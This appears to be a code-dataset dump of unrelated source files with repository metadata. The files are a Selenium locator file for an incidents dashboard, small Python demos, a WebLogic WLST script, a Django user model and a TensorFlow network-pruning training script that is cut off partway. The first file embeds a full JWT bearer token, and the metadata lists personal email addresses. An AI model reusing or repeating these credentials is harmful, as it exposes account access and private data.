USER_TOKEN = """eyJhbGciOiJSUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICJGSjg2R2NGM2pUYk5MT2NvNE52WmtVQ0lVbWZZQ3FvcXRPUWVNZmJoTmxFIn0.eyJqdGkiOiI0MjkxNjFjMi1mYzgyLTQ2MDItYTRhOS03ZjQyYjNlY2ZlMDMiLCJleHAiOjE1MTY2NDE0MDksIm5iZiI6MCwiaWF0IjoxNTE2NjQwNTA5LCJpc3MiOiJodHRwczovL2RldmVsb3BtZW50Lm1vYmlsaXR5LndvY3MzLmNvbS9hdXRoL3JlYWxtcy93b3JsZHNlbnNpbmctbW9iaWxpdHkiLCJhdWQiOiJyb2JvdCIsInN1YiI6ImNiODdkZTQwLTU2NTYtNDNiYS05Y2YxLTcyYzc3MjMzNzg3YiIsInR5cCI6IkJlYXJlciIsImF6cCI6InJvYm90IiwiYXV0aF90aW1lIjowLCJzZXNzaW9uX3N0YXRlIjoiOTU3MzNhODctYzdlMy00NDE2LWIzZGMtN2U5ZDIyODk4NmYzIiwiYWNyIjoiMSIsImFsbG93ZWQtb3JpZ2lucyI6WyJodHRwczovL2RldmVsb3BtZW50Lm1vYmlsaXR5LndvY3MzLmNvbS9hdXRoIl0sInJlYWxtX2FjY2VzcyI6eyJyb2xlcyI6WyJSZWFkQVBJVXNlciIsInVtYV9hdXRob3JpemF0aW9uIiwidXNlciJdfSwicmVzb3VyY2VfYWNjZXNzIjp7Im1vYmlsaXR5LXdlYi1hcHAiOnsicm9sZXMiOlsidXNlciJdfSwiYWNjb3VudCI6eyJyb2xlcyI6WyJtYW5hZ2UtYWNjb3VudCIsIm1hbmFnZS1hY2NvdW50LWxpbmtzIiwidmlldy1wcm9maWxlIl19fSwicHJlZmVycmVkX3VzZXJuYW1lIjoicm9ib3QtdXNlciJ9.Ecf68DS8oT3ZNofE008ig6ufshhkE3omyKjmZnxc-8Vf8Ab_upM90KwjPvQPG0E39w_WleSMoRIxGHtLp1ZA25oWJrU36GgertQ7oklWuNMMNaY7IbkIt5u8_UvqOgVhQupqpoY4rY4Wyy7Okj7g-xk5b5rs70ONh70BoL89Le4"""
# Left Menu
menu_button = '//*[@id="Incidents"]'
icon_xpath = menu_button + "/div[1]/img"
label_xpath = menu_button + "/div[2]"
menu_button_id = "id:Incidents"
menu_title_path = 'xpath://span[contains(@class, "mainTitleText")]' # TODO move to global
menu_title = "INCIDENTS"
menu_tooltip = "Incidents Insights"
title = "Incidents"
# Map
map_tile = """//*[@id="map"]/div[1]/div[1]/div[2]/div[2]/img[1]"""
# Queries
INCIDENT_ID = 166
AREA_ID = 4
INCIDENT_TYPES = "/mb/data/api/v2/sql?q=SELECT%20name%20FROM%20df_incidences_types"
CURRENT_INCIDENTS = "/mb/data/api/v2/sql?q=SELECT%20*%20FROM%20df_incidences_count_open_mview"
CURRENT_MI = "/mb/data/api/v2/sql?q=SELECT%20*%20FROM%20df_incidences_open_global_current_matching_mview"
INCIDENTS_TABLE = "/mb/data/api/v2/sql?q=SELECT%20i.title%2C%20t.name%2C%20i.impact%2C%20i.start_time%2C%20i.type%20%20FROM%20df_incidences_open_mview%20i%20INNER%20JOIN%20df_incidences_types%20t%20ON%20i.type%20%3D%20t.id"
SPECIFIC_INCIDENT = "/mb/data/api/v2/sql?q=SELECT%20i.*%2C%20t.name%20FROM%20df_incidences_open_mview%20i%20INNER%20JOIN%20df_incidences_types%20t%20ON%20i.type%20%3D%20t.id%20WHERE%20incidence_id%3D{}".format(INCIDENT_ID)
SPECIFIC_AREA = "/mb/data/api/v2/sql?q=SELECT%20*%20FROM%20df_incidences_count_open_areas_mview%20WHERE%20area_id%3D{}".format(AREA_ID)
AREA_NAME = "/mb/data/api/v2/sql?q=SELECT%20geom.area_name%2C%20inc.*%20FROM%20df_incidences_count_open_areas_mview%20inc%20%0A%20%20%20%20%20%20%20%20%20%20INNER%20JOIN%20df_incidences_areas_geom%20geom%20ON%20inc.area_id%20%3D%20geom.area_id%20WHERE%20inc.area_id%3D{}".format(AREA_ID)
AREA_MI = "/mb/data/api/v2/sql?q=SELECT%20*%20FROM%20df_incidences_open_areas_current_matching_mview%20WHERE%20area_id%3D{}".format(AREA_ID)
# Private Layers
top_layers_base = '//div[contains(@class, "topLayerManager__style")]'
image = '//div[contains(@class,"image-wrapper")]/img'
text = '//div[contains(@class,"text-wrapper")]/span[1]/span'
position_label = "LOCATION"
position_base = top_layers_base + "/div[1]"
position_icon_xpath = position_base + image
position_label_xpath = position_base + text
heatmap_label = "HEATMAP"
heatmap_base = top_layers_base + "/div[2]"
heatmap_icon_xpath = heatmap_base + image
heatmap_label_xpath = heatmap_base + text
number_label = "NUMBER"
number_base = top_layers_base + "/div[3]"
number_icon_xpath = number_base + image
number_label_xpath = number_base + text
density_label = "DENSITY"
density_base = top_layers_base + "/div[4]"
density_icon_xpath = density_base + image
density_label_xpath = density_base + text
mi_label = "MATCHING INDEX"
mi_base = top_layers_base + "/div[5]"
mi_icon_xpath = mi_base + image
mi_label_xpath = mi_base + text
timelapse_label = "LAST 7 DAYS"
timelapse_base = top_layers_base + "/div[6]"
timelapse_icon_xpath = timelapse_base + image
timelapse_label_xpath = timelapse_base + text
# Popups
popup_incident_title = """//*[@id="popup-generic"]/div/div[1]/div[2]/div[1]/div/div/div[2]"""
popup_incident_type = '//*[@id="popup-generic"]//div[contains(@class, "incidenceTable__tdType")]'
popup_incident_date = """//*[@id="incidents_table"]/div[1]/div[4]"""
popup_incident_impact = """//*[@id="popup-generic"]/div/div[1]/div[2]/div[1]/div/div/div[3]"""
popup_incident_description = """//*[@id="popup-generic"]/div/div[1]/div[2]/div[3]/p"""
popup_area_incidents = """//*[@id="popup-generic"]/div/div[1]/div[2]/div/div[2]/div/div[1]/h2[2]"""
popup_area_mi = """//*[@id="popup-generic"]/div/div[1]/div[2]/div/div[2]/div/div[2]/div/p"""
# Left Panel
title = "Incidents"
area_chart = """//*[@id="leftside"]/div/div[3]/div[1]/div[2]/div/div[1]/div[1]"""
table_asc_button = """//*[@id="leftside"]/div/div[4]/div/button[@id="ascincidences"]"""
table_desc_button = """//*[@id="leftside"]/div/div[4]/div/button[@id="descincidences"]"""
global_mi = """//*[@id="leftside"]/div/div[3]/div[2]/div[2]/div/p"""
global_incidents = """//*[@id="leftside"]/div/div[3]/div[2]/div[1]/h2[2]"""
incident_in_table = """//*[@id="incidents_table"]/div[1]"""
|
[
"gonzalo.parra@smartmatic.com"
] |
gonzalo.parra@smartmatic.com
|
a0815501c5c2236cf3afadc0f17d300fbfed87ac
|
ebe593e0f17cf228683e80885af767bda77c0e2c
|
/Json/json-types.py
|
ac0cf0ab0617803387ac87c33487e7703cc15a49
|
[] |
no_license
|
juliocsg/python-cesar
|
55c61ea2c1be638c125d3a51145b429d32643364
|
dbc4a9eea767a181d0cff5f3ce654ffdd22a76dd
|
refs/heads/master
| 2020-04-29T19:21:03.529125
| 2019-04-16T21:52:02
| 2019-04-16T21:52:02
| 176,351,226
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 287
|
py
|
import json
print(json.dumps({"name":"John", "age" : 30}))
print(json.dumps(["apple", "bananas"]))
print(json.dumps(("apple", "bananas")))
print(json.dumps("hello"))
print(json.dumps(42))
print(json.dumps(31.76))
print(json.dumps(True))
print(json.dumps(False))
print(json.dumps(None))
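# A minimal companion sketch: json.loads() parses such strings back into
# Python objects (JSON null becomes None, arrays become lists).
print(json.loads('{"name": "John", "age": 30}'))
print(json.loads('["apple", "bananas"]'))
print(json.loads('null'))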
|
[
"jcesarsaucedo1993@gmail.com"
] |
jcesarsaucedo1993@gmail.com
|
631eff29fcaf2865ed65ee90e0f051d4a6fa53a9
|
331080f6ac4063803f97c2f95ef32b53b58e1c23
|
/env/bin/pyrsa-verify
|
e9559a0046017f8b829b719266220b1ab4931a95
|
[
"MIT"
] |
permissive
|
jlwysf/onduty
|
c881f692ad6cd76a77539c1ba325b5a53bf44bb7
|
20d90583a6996d037912af08eb29a6d6fa06bf66
|
refs/heads/master
| 2020-04-13T13:13:09.063357
| 2018-12-26T22:48:58
| 2018-12-26T22:48:58
| 163,223,513
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 238
|
#!/Users/ewang/SRE/openduty/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from rsa.cli import verify
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(verify())
|
[
"ewang@Erics-MacBook-Pro.local"
] |
ewang@Erics-MacBook-Pro.local
|
|
b12ab9e2c989a357198e7f9d97c41992e5d033e4
|
d9216275d4c9be88a57d4b0a8b63146ca741193a
|
/Wlst/wlst/CreateWorkManagerRaiseVoiceActivity.py
|
ae8207d9f82d26d8ae2a80094b6dfabeb1f518ab
|
[] |
no_license
|
simon-cutts/message-broker
|
9fd0363e85d21398048b1f0c4907da7ef3bb8358
|
8c8a20bf56fd8e101b5e7114f2e8bdd9721c2683
|
refs/heads/master
| 2021-04-02T03:41:13.572300
| 2020-03-18T13:53:07
| 2020-03-18T13:53:07
| 248,239,797
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,389
|
py
|
if __name__ == '__main__':
from wlstModule import *#@UnusedWildImport
"""
Creates following items:
RaiseVoiceActivityWorkManager
RaiseVoiceActivityMaxThreadsConstraint
Author: Simon Cutts
"""
import sys
from java.lang import System
from java.io import FileInputStream
from java.lang import String
from java.util import Properties
" Load the properties file"
propInputStream = FileInputStream("build.properties")
configProps = Properties()
configProps.load(propInputStream)
" Set the properties"
username = configProps.get("username")
password = configProps.get("password")
adminUrl=configProps.get("adminUrl")
domain = configProps.get("domain")
clusterName = configProps.get("cluster")
" Connect to the server "
connect(userConfigFile=username,userKeyFile=password,url=adminUrl)
edit()
startEdit()
print 'Creating WorkManager RaiseVoiceActivityWorkManager '
cd('/SelfTuning/' + domain)
cmo.createWorkManager('RaiseVoiceActivityWorkManager')
cd('/SelfTuning/' + domain + '/WorkManagers/RaiseVoiceActivityWorkManager')
" Normally targeted to the cluster, except on developer machines "
if clusterName == "OSB_Cluster":
set('Targets',jarray.array([ObjectName('com.bea:Name=OSB_Cluster,Type=Cluster')], ObjectName))
else:
set('Targets',jarray.array([ObjectName('com.bea:Name=AdminServer,Type=Server')], ObjectName))
print 'Creating MaxThreadsConstraints RaiseVoiceActivityMaxThreadsConstraint '
cd('/SelfTuning/' + domain)
cmo.createMaxThreadsConstraint('RaiseVoiceActivityMaxThreadsConstraint')
cd('/SelfTuning/' + domain + '/MaxThreadsConstraints/RaiseVoiceActivityMaxThreadsConstraint')
" Normally targeted to the cluster, except on developer machines "
if clusterName == "OSB_Cluster":
set('Targets',jarray.array([ObjectName('com.bea:Name=OSB_Cluster,Type=Cluster')], ObjectName))
else:
set('Targets',jarray.array([ObjectName('com.bea:Name=AdminServer,Type=Server')], ObjectName))
cmo.setCount(2)
cmo.unSet('ConnectionPoolName')
cd('/SelfTuning/' + domain + '/WorkManagers/RaiseVoiceActivityWorkManager')
cmo.setMaxThreadsConstraint(getMBean('/SelfTuning/' + domain + '/MaxThreadsConstraints/RaiseVoiceActivityMaxThreadsConstraint'))
try:
save()
activate(block="true")
except Exception, e:
print e
print "Error while trying to save and/or activate!!!"
dumpStack()
raise
|
[
"noreply@github.com"
] |
simon-cutts.noreply@github.com
|
8b8b51d84dacfded491424244b983408e007a638
|
47ba27c8054fafe7aa96a45cc77deb64e2b4b365
|
/luggageaccomodation/apps/accounts/models.py
|
305fad8b25228897398e882733bd358a8fa3f03b
|
[] |
no_license
|
gouth-tech/luggage-accomodation
|
349a088bb81823a49094c8e378bb14d8671b2d5f
|
fe4083814b457a585d81113fbb46f3ebfa6fe309
|
refs/heads/master
| 2022-05-01T03:34:57.473100
| 2019-11-08T10:31:21
| 2019-11-08T10:31:21
| 220,246,093
| 0
| 0
| null | 2022-04-22T22:37:45
| 2019-11-07T13:41:22
|
Python
|
UTF-8
|
Python
| false
| false
| 1,322
|
py
|
from django.contrib.auth.models import AbstractUser
from django.db import models
from .managers import UserManager
from django.utils.translation import ugettext_lazy as _
from rest_framework.authtoken.models import Token
from django.utils import timezone
from django.conf import settings
# Create your models here.
class User(AbstractUser):
STATUS_CHOICES = (
(1, _("Luggage Accomodator")),
(2, _("Luggage Keeper")),
)
username = models.CharField(blank=True, max_length=20)
email = models.EmailField(_('email address'), unique=True,
error_messages={'unique': 'A user with that email already exists.'},
blank=True
)
password = models.CharField(_('password'), max_length=100, blank=True)
user_type = models.IntegerField(choices=STATUS_CHOICES, default=1)
objects = UserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = []
def __str__(self):
if self.first_name:
return self.first_name + " " + self.last_name
else:
return self.email
class ExpiringToken(Token):
class Meta(object):
proxy = True
def expired(self):
now = timezone.now()
return self.created < now - settings.EXPIRING_TOKEN_LIFESPAN
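# Minimal usage sketch (assumes settings.EXPIRING_TOKEN_LIFESPAN is a
# datetime.timedelta, as implied by the comparison above):
#
#   token = ExpiringToken.objects.get(user=some_user)
#   if token.expired():
#       token.delete()   # force the client to re-authenticate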
|
[
"goutham.m@hashroot.com"
] |
goutham.m@hashroot.com
|
446e27b184c619ef0fc295e80630f81e473b9db4
|
8b917e58028112b8c760df4f22151ec7f1b84e8f
|
/forms.py
|
8ccdf00dbeb3d3f82566d4315becd3d054eaa6e2
|
[] |
no_license
|
nandini345372/test-app
|
69112ce091d8f0ff6896dabd482a10d9ab288df4
|
8d2d7f066ae710a6b98262b5068e4abe8cd026ed
|
refs/heads/main
| 2023-02-02T08:02:46.389467
| 2020-12-19T06:21:01
| 2020-12-19T06:21:01
| 322,778,711
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 181
|
py
|
from django import forms
from .models import *
class Blogform(forms.ModelForm):
class Meta:
model = BlogModel
fields = [ "title", "description","image"]
|
[
"noreply@github.com"
] |
nandini345372.noreply@github.com
|
194ec94053ff6e9031800e98c0f2c4fe8a995fe0
|
aa7fa2d977bf84c8e297f5a831fed5b84f4efcc0
|
/Python/Search/linear_search.py
|
b2f9a92cb7ac0e18eb3348e9e1dd168f9302eae0
|
[] |
no_license
|
Divi2701/Algorithms
|
6dafaa2cbf3ce82bf08e83cb7b8bea2f9fd22821
|
1195e311a6f93c50ad66954b715a3dd770a62759
|
refs/heads/master
| 2023-08-15T23:12:55.741703
| 2021-10-18T14:22:01
| 2021-10-18T14:22:01
| 418,635,554
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,087
|
py
|
def linear_search(arr, target) -> str:
"""
Linear Search Algorithm
status = linear_search(arr, target)
>>> Enter list: 4 5 3 7 2 0 4 62 21
Enter target: 62
Found
>>> Enter list: 4 5 3 7 2 0 4 62 21
Enter target: 300
Not Found
>>> Enter list: 4,5,3,7 2 0 4 62 21
Enter target: 62
There is value error in input. Please re-enter values.
>>> Enter list: 4 5 3 7 2 0 4 62 21
Enter target: 62 4
There is value error in input. Please re-enter values.
"""
flag = False
for i in range(len(arr)):
if target == arr[i]:
flag = True
break
    if flag:
        return "Found"
return "Not Found"
if __name__ == "__main__":
try:
arr = list(map(int, input("Enter list: ").strip().split()))
target_x = int(input("Enter target: ").strip())
status = linear_search(arr, target_x)
print(status)
    except (ValueError, NameError):
print("There is value error in input. Please re-enter values. ")
|
[
"official.aakas@gmail.com"
] |
official.aakas@gmail.com
|
9355d800643a3743a49f70a15151c2832ff29f35
|
a5d0751624cccdaacef0099c03c0d7b1c30546b6
|
/basemix_manual_configs.py
|
1899ed0632974a310b7dce4eb62c3befd1377dcd
|
[] |
no_license
|
anonymous3224/slim-gtsn
|
8fcbf211e9f55b848679673fd25e1768dc87c8a4
|
97c888adcff61a3b37ebdf2ddeeed5aa5460c92d
|
refs/heads/master
| 2020-04-18T10:15:56.089213
| 2019-01-25T02:16:06
| 2019-01-25T02:16:06
| 167,094,169
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26,224
|
py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modified by Hui Guan,
# prune once and train
# prune all the valid layers and train the network with the objective being cross-entropy+regularization.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.python.client import timeline
from datasets import dataset_factory
from deployment import model_deploy
from nets import nets_factory
from preprocessing import preprocessing_factory
import numpy as np
import re, time, math , os, sys
from datetime import datetime
from pprint import pprint
from train_helper import *
from train_helper_for_resnet_v1_50 import *
slim = tf.contrib.slim
tf.app.flags.DEFINE_string(
'master', '', 'The address of the TensorFlow master to use.')
tf.app.flags.DEFINE_string(
'train_dir', '/tmp/tfmodel/',
'Directory where checkpoints and event logs are written to.')
tf.app.flags.DEFINE_integer('num_clones', 1,
'Number of model clones to deploy.')
tf.app.flags.DEFINE_boolean('clone_on_cpu', False,
'Use CPUs to deploy clones.')
tf.app.flags.DEFINE_integer('worker_replicas', 1, 'Number of worker replicas.')
tf.app.flags.DEFINE_integer(
'num_ps_tasks', 0,
'The number of parameter servers. If the value is 0, then the parameters '
'are handled locally by the worker.')
tf.app.flags.DEFINE_integer(
'num_readers', 10,
'The number of parallel readers that read data from the dataset.')
tf.app.flags.DEFINE_integer(
'num_preprocessing_threads', 16,
'The number of threads used to create the batches.')
tf.app.flags.DEFINE_integer(
'log_every_n_steps', 10,
'The frequency with which logs are print.')
tf.app.flags.DEFINE_integer(
'summary_every_n_steps', 50,
'The frequency with which summary op are done.')
tf.app.flags.DEFINE_integer(
'evaluate_every_n_steps', 100,
'The frequency with which evaluation are done.')
tf.app.flags.DEFINE_integer(
'runmeta_every_n_steps', 1000,
'The frequency with which RunMetadata are done.')
tf.app.flags.DEFINE_integer(
'save_summaries_secs', 600,
'The frequency with which summaries are saved, in seconds.')
tf.app.flags.DEFINE_integer(
'save_interval_secs', 600,
'The frequency with which the model is saved, in seconds.')
tf.app.flags.DEFINE_integer(
'task', 0, 'Task id of the replica running the training.')
######################
# Optimization Flags #
######################
tf.app.flags.DEFINE_float(
'weight_decay', 0.00004, 'The weight decay on the model weights.')
tf.app.flags.DEFINE_string(
'optimizer', 'rmsprop',
'The name of the optimizer, one of "adadelta", "adagrad", "adam",'
'"ftrl", "momentum", "sgd" or "rmsprop".')
tf.app.flags.DEFINE_float(
'adadelta_rho', 0.95,
'The decay rate for adadelta.')
tf.app.flags.DEFINE_float(
'adagrad_initial_accumulator_value', 0.1,
'Starting value for the AdaGrad accumulators.')
tf.app.flags.DEFINE_float(
'adam_beta1', 0.9,
'The exponential decay rate for the 1st moment estimates.')
tf.app.flags.DEFINE_float(
'adam_beta2', 0.999,
'The exponential decay rate for the 2nd moment estimates.')
tf.app.flags.DEFINE_float('opt_epsilon', 1.0, 'Epsilon term for the optimizer.')
tf.app.flags.DEFINE_float('ftrl_learning_rate_power', -0.5,
'The learning rate power.')
tf.app.flags.DEFINE_float(
'ftrl_initial_accumulator_value', 0.1,
'Starting value for the FTRL accumulators.')
tf.app.flags.DEFINE_float(
'ftrl_l1', 0.0, 'The FTRL l1 regularization strength.')
tf.app.flags.DEFINE_float(
'ftrl_l2', 0.0, 'The FTRL l2 regularization strength.')
tf.app.flags.DEFINE_float(
'momentum', 0.9,
'The momentum for the MomentumOptimizer and RMSPropOptimizer.')
tf.app.flags.DEFINE_float('rmsprop_momentum', 0.9, 'Momentum.')
tf.app.flags.DEFINE_float('rmsprop_decay', 0.9, 'Decay term for RMSProp.')
#######################
# Learning Rate Flags #
#######################
tf.app.flags.DEFINE_string(
'learning_rate_decay_type',
'exponential',
'Specifies how the learning rate is decayed. One of "fixed", "exponential",'
' or "polynomial"')
tf.app.flags.DEFINE_float('learning_rate', 0.01, 'Initial learning rate.')
tf.app.flags.DEFINE_float(
'end_learning_rate', 0.0001,
'The minimal end learning rate used by a polynomial decay learning rate.')
tf.app.flags.DEFINE_float(
'label_smoothing', 0.0, 'The amount of label smoothing.')
tf.app.flags.DEFINE_float(
'learning_rate_decay_factor', 0.94, 'Learning rate decay factor.')
tf.app.flags.DEFINE_float(
'num_epochs_per_decay', 2.0,
'Number of epochs after which learning rate decays.')
tf.app.flags.DEFINE_bool(
'sync_replicas', False,
'Whether or not to synchronize the replicas during training.')
tf.app.flags.DEFINE_integer(
'replicas_to_aggregate', 1,
'The Number of gradients to collect before updating params.')
tf.app.flags.DEFINE_float(
'moving_average_decay', None,
'The decay to use for the moving average.'
'If left as None, then moving averages are not used.')
#######################
# Dataset Flags #
#######################
tf.app.flags.DEFINE_string(
'dataset_name', 'imagenet', 'The name of the dataset to load.')
tf.app.flags.DEFINE_string(
'dataset_split_name', 'train', 'The name of the train/test split.')
tf.app.flags.DEFINE_string(
'dataset_dir', None, 'The directory where the dataset files are stored.')
tf.app.flags.DEFINE_integer(
'labels_offset', 0,
'An offset for the labels in the dataset. This flag is primarily used to '
'evaluate the VGG and ResNet architectures which do not use a background '
'class for the ImageNet dataset.')
tf.app.flags.DEFINE_string(
'model_name', 'inception_v3', 'The name of the architecture to train.')
tf.app.flags.DEFINE_string(
'preprocessing_name', None, 'The name of the preprocessing to use. If left '
'as `None`, then the model_name flag is used.')
tf.app.flags.DEFINE_integer(
'batch_size', 32, 'The number of samples in each batch.')
tf.app.flags.DEFINE_integer(
'train_image_size', 224, 'Train image size')
tf.app.flags.DEFINE_integer('max_number_of_steps', None,
'The maximum number of training steps.')
#####################
# Fine-Tuning Flags #
#####################
tf.app.flags.DEFINE_string(
'checkpoint_path', None,
'The path to a checkpoint from which to fine-tune.')
tf.app.flags.DEFINE_string(
'checkpoint_exclude_scopes', None,
'Comma-separated list of scopes of variables to exclude when restoring '
'from a checkpoint.')
tf.app.flags.DEFINE_string(
'trainable_scopes', None,
'Comma-separated list of scopes to filter the set of variables to train.'
'By default, None would train all the variables.')
tf.app.flags.DEFINE_boolean(
'ignore_missing_vars', False,
'When restoring a checkpoint would ignore missing variables.')
## added by Hui Guan,
tf.app.flags.DEFINE_string(
'net_name_scope_checkpoint', 'resnet_v1_50',
'The name scope for the saved previous trained network')
tf.app.flags.DEFINE_string(
'net_name_scope_pruned', 'resnet_v1_50_pruned',
'The name scope of pruned network in the current graph.')
tf.app.flags.DEFINE_string(
'configs_path', './configs_greedy/manual_configs.txt',
    'The path to the manually defined configurations')
tf.app.flags.DEFINE_integer(
'config_id', 0,
'The configuration to be evaluate')
tf.app.flags.DEFINE_integer(
'test_batch_size', 32, 'The number of samples in each batch for the test dataset.')
tf.app.flags.DEFINE_string(
'train_dataset_name', 'train', 'The name of the train/test split.')
tf.app.flags.DEFINE_string(
'test_dataset_name', 'val', 'The name of the train/test split.')
tf.app.flags.DEFINE_boolean(
'continue_training', False,
'if continue training is true, then do not clean the train directory.')
tf.app.flags.DEFINE_integer(
'max_to_keep', 5, 'The number of models to keep.')
FLAGS = tf.app.flags.FLAGS
def get_init_values_for_pruned_layers(prune_scopes, shorten_scopes, kept_percentage):
""" prune layers iteratively so prune_scopes and shorten scopes should be of size one. """
graph = tf.Graph()
with graph.as_default():
deploy_config = model_deploy.DeploymentConfig(
num_clones=FLAGS.num_clones,
clone_on_cpu=FLAGS.clone_on_cpu,
replica_id=FLAGS.task,
num_replicas=FLAGS.worker_replicas,
num_ps_tasks=FLAGS.num_ps_tasks)
dataset = dataset_factory.get_dataset(
FLAGS.dataset_name, 'train', FLAGS.dataset_dir)
batch_queue = train_inputs(dataset, deploy_config, FLAGS)
images, _ = batch_queue.dequeue()
network_fn = nets_factory.get_network_fn(
FLAGS.model_name,
num_classes=(dataset.num_classes - FLAGS.labels_offset),
weight_decay=FLAGS.weight_decay
)
network_fn(images, is_training=False)
with tf.Session() as sess:
load_checkpoint(sess, FLAGS.checkpoint_path)
variables_init_value = get_pruned_kernel_matrix(sess, prune_scopes, shorten_scopes, kept_percentage)
# remove graph
del graph
return variables_init_value
def read_manual_configs(manual_configs_path):
with open(manual_configs_path, 'r') as f:
lines = f.readlines()
configs = []
for line in lines:
line = line.strip()
if line:
            config = list(map(float, line.split(',')))  # materialize so the config can be indexed and printed
configs.append(config)
return configs
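# The configs file read above is plain text: one pruning configuration per line,
# written as comma-separated floats. A sketch of what configs_greedy/manual_configs.txt
# might contain (these values are illustrative, not taken from the original repo):
#
#   0.3,0.5,0.5,0.7
#   0.5,0.5,0.5,0.5
#
# main() duplicates each value via kept_percentage.extend([kp, kp]), so every float
# drives a pair of pruned layers.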
def main(_):
tic = time.time()
print('tensorflow version:', tf.__version__)
tf.logging.set_verbosity(tf.logging.INFO)
if not FLAGS.dataset_dir:
raise ValueError('You must supply the dataset directory with --dataset_dir')
# init
net_name_scope_pruned = FLAGS.net_name_scope_pruned
net_name_scope_checkpoint = FLAGS.net_name_scope_checkpoint
# get configs
configs = read_manual_configs(FLAGS.configs_path)
config_id = FLAGS.config_id
config = configs[config_id]
indexed_prune_scopes = valid_indexed_prune_scopes
kept_percentage = []
for i, kp in enumerate(config):
kept_percentage.extend([kp, kp])
# prepare for training with the specific config
prune_info = indexed_prune_scopes_to_prune_info(indexed_prune_scopes, kept_percentage)
# prepare file system
results_dir = os.path.join(FLAGS.train_dir, 'id'+str(config_id)) #+'_'+str(FLAGS.max_number_of_steps))
train_dir = os.path.join(results_dir, 'train')
if (not FLAGS.continue_training) or (not tf.train.latest_checkpoint(train_dir)):
prune_scopes = indexed_prune_scopes_to_prune_scopes(indexed_prune_scopes, net_name_scope_checkpoint)
shorten_scopes = indexed_prune_scopes_to_shorten_scopes(indexed_prune_scopes, net_name_scope_checkpoint)
variables_init_value = get_init_values_for_pruned_layers(prune_scopes, shorten_scopes, kept_percentage)
reinit_scopes = [re.sub(net_name_scope_checkpoint, net_name_scope_pruned, v) for v in prune_scopes+shorten_scopes]
prepare_file_system(train_dir)
def write_detailed_info(info):
with open(os.path.join(train_dir, 'train_details.txt'), 'a') as f:
f.write(info+'\n')
info = 'train_dir:'+train_dir+'\n'
info += 'config_id:'+ str(config_id)+'\n'
info += 'configuration: '+ str(config)+'\n'
info += 'indexed_prune_scopes: ' + str(indexed_prune_scopes)+'\n'
info += 'kept_percentage: ' + str(kept_percentage)
print(info)
write_detailed_info(info)
with tf.Graph().as_default():
#######################
# Config model_deploy #
#######################
deploy_config = model_deploy.DeploymentConfig(
num_clones=FLAGS.num_clones,
clone_on_cpu=FLAGS.clone_on_cpu,
replica_id=FLAGS.task,
num_replicas=FLAGS.worker_replicas,
num_ps_tasks=FLAGS.num_ps_tasks)
######################
# Select the dataset #
######################
dataset = dataset_factory.get_dataset(
FLAGS.dataset_name, FLAGS.train_dataset_name, FLAGS.dataset_dir)
test_dataset = dataset_factory.get_dataset(
FLAGS.dataset_name, FLAGS.test_dataset_name , FLAGS.dataset_dir)
batch_queue = train_inputs(dataset, deploy_config, FLAGS)
test_images, test_labels = test_inputs(test_dataset, deploy_config, FLAGS)
images, labels = batch_queue.dequeue()
######################
# Select the network#
######################
network_fn_pruned = nets_factory.get_network_fn_pruned(
FLAGS.model_name,
prune_info=prune_info,
num_classes=(dataset.num_classes - FLAGS.labels_offset),
weight_decay=FLAGS.weight_decay)
print('HG: prune_info:')
pprint(prune_info)
####################
# Define the model #
####################
logits_train, _ = network_fn_pruned(images, is_training=True, is_local_train=False, reuse_variables=False, scope = net_name_scope_pruned)
logits_eval, _ = network_fn_pruned(test_images, is_training=False, is_local_train=False, reuse_variables=True, scope = net_name_scope_pruned)
cross_entropy = add_cross_entropy(logits_train, labels)
correct_prediction = add_correct_prediction(logits_eval, test_labels)
#############################
# Specify the loss function #
#############################
tf.add_to_collection('subgraph_losses', cross_entropy)
# get regularization loss
regularization_losses = get_regularization_losses_within_scopes()
print_list('regularization_losses', regularization_losses)
# total loss and its summary
total_loss=tf.add_n(tf.get_collection('subgraph_losses'), name='total_loss')
for l in tf.get_collection('subgraph_losses')+[total_loss]:
tf.summary.scalar(l.op.name+'/summary', l)
#########################################
# Configure the optimization procedure. #
#########################################
with tf.device(deploy_config.variables_device()):
global_step = tf.Variable(0, trainable=False, name='global_step')
with tf.device(deploy_config.optimizer_device()):
learning_rate = configure_learning_rate(dataset.num_samples, global_step, FLAGS)
optimizer = configure_optimizer(learning_rate, FLAGS)
tf.summary.scalar('learning_rate', learning_rate)
#############################
# Add train operation #
#############################
variables_to_train = get_trainable_variables_within_scopes()
train_op = add_train_op(optimizer, total_loss, global_step, var_list=variables_to_train)
print_list("variables_to_train", variables_to_train)
# Gather update_ops: the updates for the batch_norm variables created by network_fn_pruned.
update_ops = get_update_ops_within_scopes()
print_list("update_ops", update_ops)
# add train_tensor
update_ops.append(train_op)
update_op = tf.group(*update_ops)
with tf.control_dependencies([update_op]):
train_tensor = tf.identity(total_loss, name='train_op')
# add summary op
summary_op = tf.summary.merge_all()
print("HG: trainable_variables=", len(tf.trainable_variables()))
print("HG: model_variables=", len(tf.model_variables()))
print("HG: global_variables=", len(tf.global_variables()))
sess_config = tf.ConfigProto(intra_op_parallelism_threads=16,
inter_op_parallelism_threads=16)
with tf.Session(config=sess_config) as sess:
###########################
# Prepare for filewriter. #
###########################
train_writer = tf.summary.FileWriter(train_dir, sess.graph)
# if restart the training or there is no checkpoint in the train_dir
if (not FLAGS.continue_training) or (not tf.train.latest_checkpoint(train_dir)):
#########################################
# Reinit pruned model variable #
#########################################
